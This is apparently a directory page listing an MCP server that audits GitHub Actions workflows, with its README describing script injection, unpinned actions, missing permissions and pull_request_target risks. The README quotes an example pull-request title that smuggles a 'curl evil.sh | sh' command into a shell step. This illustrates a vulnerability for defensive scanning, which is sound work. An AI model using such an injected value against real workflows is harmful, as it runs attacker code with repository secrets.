Skip to main content
ClaudeWave
tylerscomic-lab avatar
tylerscomic-lab

github-actions-audit-mcp

View on GitHub
MCP ServersOfficial Registry0 stars0 forks● JavaScriptMITUpdated today
ClaudeWave Trust Score
77/100
✓ Trusted
Passed
  • ✓Open-source license (MIT)
  • ✓Actively maintained (<30d)
  • ✓Topics declared
  • ✓Documented (README)
Flags
  • !No description
  • !Install pipes a remote script into a shell (curl | sh)
Last scanned: 10/2/2026
Install in Claude Code / Claude Desktop
Method: Manual
Claude Code CLI
git clone https://github.com/tylerscomic-lab/github-actions-audit-mcp
claude_desktop_config.json (Claude Desktop)
{
  "mcpServers": {
    "github-actions-audit-mcp": {
      "command": "node",
      "args": ["/path/to/github-actions-audit-mcp/dist/index.js"]
    }
  }
}
1. Run the command above in your terminal (Claude Code), or paste the JSON config into claude_desktop_config.json (Claude Desktop).
2. Replace any <placeholder> values with your API keys or paths.
3. Restart Claude. The MCP server and its tools appear automatically.
💡 Clone https://github.com/tylerscomic-lab/github-actions-audit-mcp and follow its README for install instructions.
Use cases

MCP Servers overview

# github-actions-audit-mcp

[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](LICENSE)
[![Live on MCPize](https://img.shields.io/badge/Live%20on-MCPize-6d28d9)](https://mcpize.com/mcp/github-actions-audit-mcp)

An MCP server that audits GitHub Actions workflow YAML for the real vulnerability classes that have caused actual
incidents — not a linter, a security scanner. Parses genuine YAML structure (a hand-written block parser scoped to
what workflow files actually use), not string/regex matching against the raw file.

## What it catches

**Script injection.** Any `${{ github.event.issue.title }}`-style expression that carries attacker-controlled text
(issue/PR titles, comments, review bodies, branch names) interpolated directly into a `run:` shell step. The
expression is substituted into the generated shell script *before* the shell runs it — a PR titled `"; curl evil.sh
| sh #` becomes literal shell syntax, not a string. This is the single most common real-world GitHub Actions
vulnerability. Flags the exact expression and shows the env-variable fix that actually neutralizes it.

**Unpinned third-party actions.** `uses: some-action@v4` or `@main` can be repointed by whoever controls that
tag/branch, without you changing a single character in your workflow file — this is exactly what happened in the
[tj-actions/changed-files compromise](https://github.com/tj-actions/changed-files) (March 2025), where a maintainer's
PAT was used to retag `v35`–`v46` to point at a credential-harvesting commit. Only a full 40-character commit SHA is
immutable.

**Missing `permissions:` blocks.** No explicit `permissions:` means the `GITHUB_TOKEN` defaults to whatever your
repo/org settings allow — often read-write. If any step is ever compromised, it inherits that full scope.

**`pull_request_target` + head checkout.** This trigger runs with the base repo's secrets and a write-scoped token
(unlike plain `pull_request`), and if the workflow also checks out the PR's own head commit, a fork's PR can run
arbitrary code with your secrets. Real supply-chain incidents follow this exact pattern.

## Tools

### `audit_workflow`
Full audit of a workflow YAML file. Returns a risk level and every finding with its exact location, why it's
dangerous, and a concrete fix.

### `check_expression_injection`
Focused check on a single shell command string, for when you just want to sanity-check one `run:` step without a
full workflow file.

## Use it

**Hosted (recommended):** [MCPize](https://mcpize.com/mcp/github-actions-audit-mcp) — free tier, $7/mo Pro.

**Self-host:**
```bash
npm install
node server.js
```

## Part of a small suite

[regex-safety-audit-mcp](https://github.com/tylerscomic-lab/regex-safety-audit-mcp),
[mcp-trust-audit-mcp](https://github.com/tylerscomic-lab/mcp-trust-audit-mcp),
[secrets-leak-audit-mcp](https://github.com/tylerscomic-lab/secrets-leak-audit-mcp),
[dockerfile-audit-mcp](https://github.com/tylerscomic-lab/dockerfile-audit-mcp).

## License

MIT
ci-cdgithub-actionsmcpmcp-servermodel-context-protocolsecurity

What people ask about github-actions-audit-mcp

What is tylerscomic-lab/github-actions-audit-mcp?

+

tylerscomic-lab/github-actions-audit-mcp is mcp servers for the Claude AI ecosystem with 0 GitHub stars.

How do I install github-actions-audit-mcp?

+

You can install github-actions-audit-mcp by cloning the repository (https://github.com/tylerscomic-lab/github-actions-audit-mcp) or following the README instructions on GitHub. ClaudeWave also provides quick install blocks on this page.

Is tylerscomic-lab/github-actions-audit-mcp safe to use?

+

Our security agent has analyzed tylerscomic-lab/github-actions-audit-mcp and assigned a Trust Score of 77/100 (tier: Trusted). See the full breakdown of passed checks and flags on this page.

Who maintains tylerscomic-lab/github-actions-audit-mcp?

+

tylerscomic-lab/github-actions-audit-mcp is maintained by tylerscomic-lab. The last recorded GitHub activity is dated 2026-10-01, with 0 open issues.

Are there alternatives to github-actions-audit-mcp?

+

Yes. On ClaudeWave you can browse similar mcp servers at /categories/mcp, sorted by popularity or recent activity.

Deploy github-actions-audit-mcp to your cloud

Ship this repo to production in minutes. Each platform spins up its own environment with editable env vars.

Maintain this repo? Add a badge to your README

Drop the badge into your GitHub README to show it's tracked on ClaudeWave. Each badge links back to this page and reflects the live Trust Score.

Featured on ClaudeWave: tylerscomic-lab/github-actions-audit-mcp
[![Featured on ClaudeWave](https://claudewave.com/api/badge/tylerscomic-lab-github-actions-audit-mcp)](https://claudewave.com/repo/tylerscomic-lab-github-actions-audit-mcp)
<a href="https://claudewave.com/repo/tylerscomic-lab-github-actions-audit-mcp"><img src="https://claudewave.com/api/badge/tylerscomic-lab-github-actions-audit-mcp" alt="Featured on ClaudeWave: tylerscomic-lab/github-actions-audit-mcp" width="320" height="64" /></a>